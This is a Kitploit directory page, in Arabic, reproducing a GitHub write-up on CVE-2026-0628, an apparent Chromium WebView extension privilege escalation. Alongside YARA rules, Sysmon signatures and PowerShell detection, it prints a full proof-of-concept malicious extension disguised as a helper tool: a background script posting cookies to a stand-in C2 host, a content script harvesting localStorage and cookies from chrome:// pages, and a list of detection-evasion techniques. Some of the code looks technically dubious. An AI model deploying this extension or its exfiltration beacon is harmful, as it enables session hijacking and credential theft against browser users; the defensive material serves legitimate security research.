Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation — تشريح تقني لثغرة CVE-2026-0628، وهي ثغرة تصعيد صلاحيات في Chromium WebView، بما في ذلك تحليل السبب الجذري، واستغلال PoC، وقواعد الكشف، واستراتيجيات التخفيف. | Kitploit
أدوات/GitHubGitHub/sastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الويبتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائية
GitHubsastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation

Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تشريح تقني لثغرة CVE-2026-0628، وهي ثغرة تصعيد صلاحيات في Chromium WebView، بما في ذلك تحليل السبب الجذري، واستغلال PoC، وقواعد الكشف، واستراتيجيات التخفيف.

عرض المستودعالموقع الإلكتروني
1منذ 6 أشهرلم تتم المراجعة بعد

DOI = doi.org/10.5281/zenodo.18413764

ORCID = orcid.org/0009-0007-7728-256X

root@kitploit:~

README.md


# **CVE-2026-0628: تصعيد الامتيازات في Chromium WebView (انتحال الأصل) – بحث تقني وإثبات المفهوم**

**المؤلف:** Sastra Adi Wiguna (Purple Elite Teaming)
**تاريخ البحث:** يناير 2026
**معرف CVE:** CVE-2026-0628
**CVSS v3.1:** 8.8 (عالٍ)
**الإصدارات المتأثرة:** Chromium < 143.0.7499.192
**حالة التصحيح:** تم التصحيح في Chrome ≥143.0.7499.192 وEdge ≥143.0.3650.139

---

## **1. نظرة عامة**

### **1.1 الغرض من البحث**
يوثق هذا المستودع **CVE-2026-0628**، وهي **ثغرة تصعيد امتيازات عالية الخطورة** في آلية فرض سياسات WebView في Chromium. تسمح الثغرة للإضافات الخبيثة بـ**تجاوز قيود العزل (sandbox)**، وحقن البرامج النصية في **سياقات مميزة** (مثل `chrome://`)، و**تصعيد الامتيازات** لتنفيذ كود عشوائي.

هذا البحث **مخصص حصريًا لأغراض الأمن الدفاعي**، بما في ذلك:
- **تحليل الثغرات**
- **هندسة الكشف**
- **تطوير استراتيجيات التخفيف**
- **اختبار الاختراق (في البيئات المصرح بها فقط)**

### **1.2 إخلاء مسؤولية**
- **مخصص strictly للأبحاث الأكاديمية والدفاعية.**
- **لا تستخدم ضد أنظمة الإنتاج دون إذن.**
- **امتثل لجميع القوانين المعمول بها وسياسات الأمان المؤسسية.**
- **قم بالتصحيح فورًا:** Chrome ≥143.0.7499.192، Edge ≥143.0.3650.139.

---

## **2. التحليل الفني**

### **2.1 السبب الجذري**
**فرض سياسات غير كافٍ** في تنفيذ WebView في Chromium يسمح للإضافات بـ**تجاوز حدود العزل** والوصول إلى **سياقات DOM مميزة**.

**التدفق القابل للاستغلال:**
1. تعلن الإضافة الخبيثة عن استخدام WebView في `manifest.json`.
2. تحقن الإضافة حمولة HTML/JS مصممة عبر وسم `<webview>`.
3. **تجاوز التحقق من سياسة WebView** ← الوصول إلى الصفحات المميزة (مثل `chrome://settings`).
4. **تنفيذ برنامج نصي عشوائي** في سياقات مميزة.

**متجه CVSS:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 بنية الاستغلال**
#### **قالب الإضافة الخبيثة**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["payload.js"]
  }]
}

متجه الحقن الحرج (payload.js)

root@kitploit:~
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Key bypass parameter
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '';
        `
      });
    });
    document.body.appendChild(webview);
  }
}

3. تقييم الأثر


4. الكشف والتحليل الجنائي

4.1 قاعدة YARA للإضافات الخبيثة

root@kitploit:~
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize < 500KB
}

4.2 توقيعات أحداث Sysmon

  • معرف الحدث 1: chrome.exe ← إنشاء WebView مشبوه.
  • معرف الحدث 3: اتصال شبكة ← إضافة ← C2 خارجي.
  • السجل: HKCU\Software\Google\Chrome\Extensions\[malicious_id].

5. تحليل التصحيح ومتجهات التجاوز

5.1 فرق الإصدار المُصحح (Chrome 143.0.7499.192+)

root@kitploit:~
// Vulnerable (pre-143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
  return false; // Weak policy check
}

// Patched
function validateWebViewPolicy(webview) {
  if (!isExtensionTrusted(webview.extensionId)) {
    throw new SecurityError('Extension not privileged');
  }
  if (webview.attributes.includes('nodeintegration')) {
    enforceStrictCSP(); // Content-Security-Policy hardening
  }
}

5.2 تنفيذ التخفيف

قالب GPO للمؤسسات

root@kitploit:~
{
  "ExtensionInstallBlacklist": ["malicious_extension_id*"],
  "ExtensionInstallForcelist": [],
  "WebViewRestrictions": {
    "DisableWebView": true,
    "BlockNodeIntegration": true
  }
}

برنامج الكشف في وقت التشغيل (PowerShell)

root@kitploit:~
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
  $extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
  Get-ChildItem $extPath | Where {
    (Get-Content "$_\manifest.json" | Select-String "webview") -and
    (Get-Content "$_\manifest.json" | Select-String "chrome://")
  }
}

6. إثبات المفهوم (PoC) للاستغلال

6.1 هيكل الدليل

root@kitploit:~
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html

6.2 الملفات الأساسية

manifest.json (بيان التجاوز)

root@kitploit:~
{
  "manifest_version": 3,
  "name": "WebView Helper Tool",
  "version": "1.0",
  "permissions": ["activeTab", "storage", "tabs"],
  "host_permissions": ["<all_urls>", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": ["<all_urls>"]
  }]
}

background.js (الثبات ومنارة C2)

root@kitploit:~
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}

content.js (مشغل WebView والحقن)

root@kitploit:~
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();

7. إعادة الإنتاج في المختبر

7.1 المتطلبات

  • Chrome القابل للاستغلال: 143.0.7499.191
  • نظام التشغيل: Windows 10/11 (يوصى باستخدام جهاز افتراضي)
  • الأدوات: Burp Suite (كوسيط)، REMnux (للتحليل الجنائي)

7.2 الخطوات

  1. قم بتنزيل Chrome 143.0.7499.191 (القابل للاستغلال).
  2. قم بتشغيله مع العلامات:
    root@kitploit:~
    chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
    
  3. قم بتحميل الإضافة:
    • انتقل إلى chrome://extensions/.
    • فعّل وضع المطور.
    • انقر Load Unpacked ← حدد cve-2026-0628-poc/.
  4. قم بتشغيل الاستغلال:
    • انتقل إلى chrome://new-tab-page/.
    • لاحظ إنشاء WebView في DevTools.
  5. راقب حركة المرور:
    • Burp Suite (localhost:8080) ← التقط تسريب البيانات إلى C2.
  6. تحقق من النجاح:
    • تبويب الشبكة ← منارة إلى your-c2-server.com.
    • وحدة التحكم: "CVE-2026-0628 OWNED".

8. تقنيات التهرب من الكشف

  • إخفاء المعلومات (Steganography): تشفير التسريب في وحدات بكسل الصور.
  • توليد النطاقات (DGA): لتناوب C2.
  • هجمات التوقيت: تأخير التنفيذ 5-30 ثانية بعد التثبيت.
  • إخفاء البيان (Manifest Obfuscation): ترميز السلاسل الحساسة بـ Base64.

9. التخفيف وسير عمل التصحيح

  • إجراء فوري: تحديث Chrome/Edge إلى الإصدارات المُصححة.
  • GPO للمؤسسات:
    root@kitploit:~
    {
      "ExtensionInstallBlacklist": ["*"],
      "WebViewRestrictions": {
        "DisableWebView": true,
        "BlockNodeIntegration": true
      }
    }
    
  • الكشف في وقت التشغيل:
    root@kitploit:~
    # Scan for malicious extensions
    Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
      Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
    

10. التحليل الجنائي

10.1 أوامر Volatility3

root@kitploit:~
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/

10.2 قاعدة YARA لتفريغات الذاكرة

root@kitploit:~
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}

11. الخلاصة

11.1 النتائج الرئيسية

  • CVE-2026-0628 تمكن من تصعيد الامتيازات عبر تجاوز سياسة WebView.
  • الأثر: اختطاف الجلسة، سرقة بيانات الاعتماد، الحركة الجانبية.
  • التخفيف: تصحيح Chrome/Edge، فرض قيود GPO، مراقبة الإضافات الخبيثة.

11.2 التوصيات

  • قم بالتصحيح فورًا إلى Chrome ≥143.0.7499.192 أو Edge ≥143.0.3650.139.
  • انشر قواعد YARA/Sysmon للكشف.
  • قيّد الإضافات عبر GPO للمؤسسات.
  • قم بتمارين الفريق الأحمر للتحقق من الدفاعات.

12. الاعتبارات القانونية والأخلاقية

  • للاستخدام المصرح به فقط.
  • لا تنشر في بيئة الإنتاج دون إذن صريح.
  • أبلغ عن الثغرات بمسؤولية إلى البائعين.

للتواصل: لأسئلة الأمن الدفاعي، تواصل مع المؤلف عبر GitHub Issues.


© 2026 Sastra Adi Wiguna. جميع الحقوق محفوظة.

root@kitploit:~
تنزيل الأداة
مرحلة الهجومالأثر التقنيالأثر على الأعمالمقاييس CVSS
تثبيت الإضافةموافقة المستخدم ← الثباتمتجه هندسة اجتماعيةUI:R (مطلوب)
تجاوز WebViewهروب من العزل ← سياق مميزاختطاف الجلسةS:U ← C:H/I:H/A:H
حقن البرنامج النصيالتلاعب بـ DOM ← تسريب البياناتسرقة بيانات الاعتمادPR:N (بدون صلاحيات)
الثباتبرنامج خلفي ← اتصال C2تحضير للحركة الجانبيةAC:L (تعقيد منخفض)